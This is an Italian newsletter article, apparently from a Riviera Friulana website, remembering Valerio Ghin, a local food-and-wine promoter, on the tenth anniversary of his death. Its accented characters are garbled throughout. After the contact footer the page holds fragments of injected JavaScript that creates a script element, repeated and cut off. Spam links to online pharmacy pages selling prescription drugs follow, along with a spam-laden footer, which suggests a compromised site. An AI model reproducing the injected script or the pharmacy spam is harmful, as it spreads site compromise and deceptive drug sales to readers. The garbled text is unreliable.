Eai??i?? CAMBIATO IL MONDO DELLA COMUNICAZIONE, DELLai??i??ENOGASTRONOMIA, MA LE IDEE DI VALERIO GHIN

SONO SEMPRE ATTUALI: RETE DI IMPRESE E CLUB DI PRODOTTO PER IL RILANCIO DEL TERRITORIO Eai??i?? cambiato il mondo della comunicazione, dellai??i??enogastronomia, ma le sue idee sono, e probabilmente rimarranno, attuali. In questi giorni ricorre il decimo anniversario della scomparsa di Valerio Ghin, il promotore enogastronomico, come amava farsi definire, ma in particolare promotore del territorio, del suo territorio, che ha saputo gettare le basi della coesione di rete, del club di prodotto, del percorso lungo il quale si sta sviluppando lai??i??idea della Riviera Friulana. Unai??i??idea che ha concorso a far germinare, e della quale sarebbe stato protagonista, cavalcando la valorizzazione delle eccellenze della terra che amava. Lo conoscevamo da sempre. Da quando compiva le prime esperienze allai??i??Hotel Astoria Italia, quando il ristorante rappresentava uno dei punti di riferimento della mondanitAi??, della politica, dellai??i??enogastronomia friulana. Per riportare una frase di Walter Filiputti, che ebbe modo di apprezzarlo come sommelier rivierasco, ai???E pAi??sin duc di lAi??ai???! (ai???passano tutti di lAi??ai??i??, in lingua friulana). Si riferiva al fatto che il ristorante A? un crocevia delle genti, punto di ritrovo e di riferimento non soltanto dei navigatori del gusto. E Valerio lo sapeva bene, e aveva privilegiato da subito lai??i??enogastronomia per valorizzare, far conoscere, cercare di rilanciare quella Bassa Friulana della quale, ce lai??i??aveva confidato piA? volte, bisognava cambiare il nome. E oltre a ideare eventi che tuttora a Marano e nelle terre rivierasche non sono purtroppo stati replicati, come le serate della ai???cucina delle quattro luneai??i??, la cucina stagionale, che si puA? riconoscere per i prodotti ittici diversi che deve valorizzare, aveva gettato il seme della rete rivierasca. Fu Valerio a farmi incontrare Marano Lagunare, e un gruppo di amici, che facendo riferimento al Ristorante ai???Ai tre canaiai??i??, a Giorgio Dal Forno, sempre propenso a sperimentare nuove iniziative, a scavare nello scrigno dei sapori della tradizione lagunare e adriatica, creA? il primo sodalizio per la promozione del territorio maranese: La compagnia del bisato. E a spingere Dal Forno a rilanciare il piatto principe della cucina maranese: il ai???bisato in speoai??i??. A Valerio la Stampa Agricola, Agroalimentare, dellai??i??Ambiente e Territorio del Friuli Venezia Giulia ha dedicato un premio giornalistico che A? giunto alla settima edizione, e che ha stimolato e mobilitato giornalisti italiani ed esteri, noti conduttori televisivi e ricercatori del gusto, che hanno cosAi?? potuto apprezzare e far conoscere e divulgare le carature dellai??i??area, e di quella Marano Lagunare che tanto amava. E riteniamo sia proprio questo che volesse, che fosse il suo progetto di vita. Carlo Morandini Lignano Sabbiadoro, 12 dicembre 2014. larivierafriulanaAi?? NEWSLETTER Lignano Sabbiadoro ai??i?? Udine (Italia) Sito: www.larivierafriulana.it Email: info@larivierafriulana.it Tel: +39 335 370816 Skype: charliesette Faceboook: RIVIERA FRIULANA Twitter: @rivierafriulanavar d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’); http://naminov.com/costco-pharmacy-voltaren/ online http://rarespanta.ro/order-exelon-nuclear/ Order wellbutrin xl generic manufacturers purchase dapoxetine reviews http://hongkongnews.com.hk/order-desyrel-medication/ Order

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo